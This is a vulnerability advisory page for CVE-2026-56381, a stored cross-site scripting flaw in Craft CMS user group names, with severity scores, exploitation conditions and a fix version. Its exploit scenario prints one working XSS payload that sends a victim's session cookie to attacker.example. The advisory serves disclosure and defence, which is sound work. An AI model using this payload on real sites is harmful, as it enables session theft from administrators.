Skip to main content

Craft CMS CVE-2026-56381

| EUVDEUVD-2026-38175 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-21 VulnCheck GHSA-9r7j-7jhg-4f4c
4.6
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
4.6 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.8 MEDIUM

Admin credentials required (PR:H); victim must visit permissions page (UI:R); payload executes cross-user causing scope change (S:C); no availability impact.

3.1 AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
A
Scope
X

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 22, 2026 - 06:36 vuln.today
Analysis Generated
Jun 22, 2026 - 06:36 vuln.today
Patch available
Jun 21, 2026 - 15:31 EUVD

DescriptionCVE.org

Craft CMS from version 5.0.0-RC1 contains a stored cross-site scripting vulnerability in the User Permissions page where user group names are rendered without proper HTML escaping. Attackers with admin access can inject arbitrary JavaScript via the user group name field that executes when other users view or edit permissions.

AnalysisAI

Stored XSS in Craft CMS (versions 5.0.0-RC1 through 5.8.21) allows an admin-level attacker to permanently embed malicious JavaScript into the User Permissions page by crafting a user group name with an unsanitized HTML payload. The script executes in the browser of any user who subsequently opens the Permissions tab on a user's edit page, creating a persistent cross-user attack vector within the control panel. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker authenticates as Craft CMS admin
Delivery
Navigate to Settings
Exploit
User Groups
Install
Inject HTML/JS payload into group name field
C2
Save malicious user group to database
Execute
Victim admin opens user edit page and clicks Permissions tab
Impact
Stored payload renders unescaped and executes in victim's browser context

Vulnerability AssessmentAI

Exploitation Exploitation requires: (1) the attacker holds admin-level access to the Craft CMS control panel - PR:H per CVSS; (2) the Craft CMS instance has allowAdminChanges enabled in its production configuration - this is a non-default posture explicitly warned against in Craft's security documentation; (3) a second user must actively navigate to the Permissions tab of a user edit page (/admin/users/{id}) after the malicious group name is saved - UI:A per CVSS 4.0. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 4.6 (Medium) reflects the high privilege requirement (PR:H - admin access) and required user interaction (UI:A), which significantly limit the realistic attack surface compared to a typical stored XSS. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with admin credentials on a Craft CMS 5.x installation that has allowAdminChanges enabled navigates to Settings → Users → User Groups, creates or renames a group with the payload '<img src=x onerror="fetch('https://attacker.example/steal?c='+document.cookie)" hidden>', and saves it. When a second admin or privileged user later opens any user's edit page and clicks the Permissions tab, the injected script silently exfiltrates the victim's session cookie to the attacker's server. …
Remediation Upgrade Craft CMS to version 5.8.22 or later, which applies output escaping to user group names in the User Permissions page template per the upstream fix referenced in https://github.com/craftcms/cms-ghsa-4mgv-366x-qxvx/pull/2. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Cms

View all
CVE-2020-7357 CRITICAL POC
9.9 Aug 06

Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. Rated c

CVE-2012-4405 MEDIUM
6.8 Sep 18

Multiple integer underflows in the icmLut_allocate function in International Color Consortium (ICC) Format library (iccl

CVE-2021-47753 CRITICAL POC
9.8 Jan 15

phpKF CMS 3.00 Beta allows unauthenticated PHP file upload by disguising it as a PNG, then renaming it for execution. Po

CVE-2019-9874 CRITICAL POC
9.8 May 31

Deserialization of Untrusted Data in the Sitecore.Security.AntiCSRF (aka anti CSRF) module in Sitecore CMS 7.0 to 7.2 an

CVE-2019-9875 HIGH POC
8.8 May 31

Deserialization of Untrusted Data in the anti CSRF module in Sitecore through 9.1 allows an authenticated attacker to ex

CVE-2012-5894 HIGH POC
7.5 Nov 17

SQL injection vulnerability in hava_post.php in Havalite CMS 1.1.0 and earlier allows remote attackers to execute arbitr

CVE-2012-5893 MEDIUM POC
6.8 Nov 17

Unrestricted file upload vulnerability in hava_upload.php in Havalite CMS 1.1.0 and earlier allows remote attackers to e

CVE-2015-2083 MEDIUM POC
6.8 Feb 25

Cross-site request forgery (CSRF) vulnerability in Ilch CMS allows remote attackers to hijack the authentication of admi

CVE-2012-5919 MEDIUM POC
4.3 Nov 19

Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 and earlier allow remote attackers to inject arbit

CVE-2025-5429 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

CVE-2025-5428 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

CVE-2025-5427 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

Share

CVE-2026-56381 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy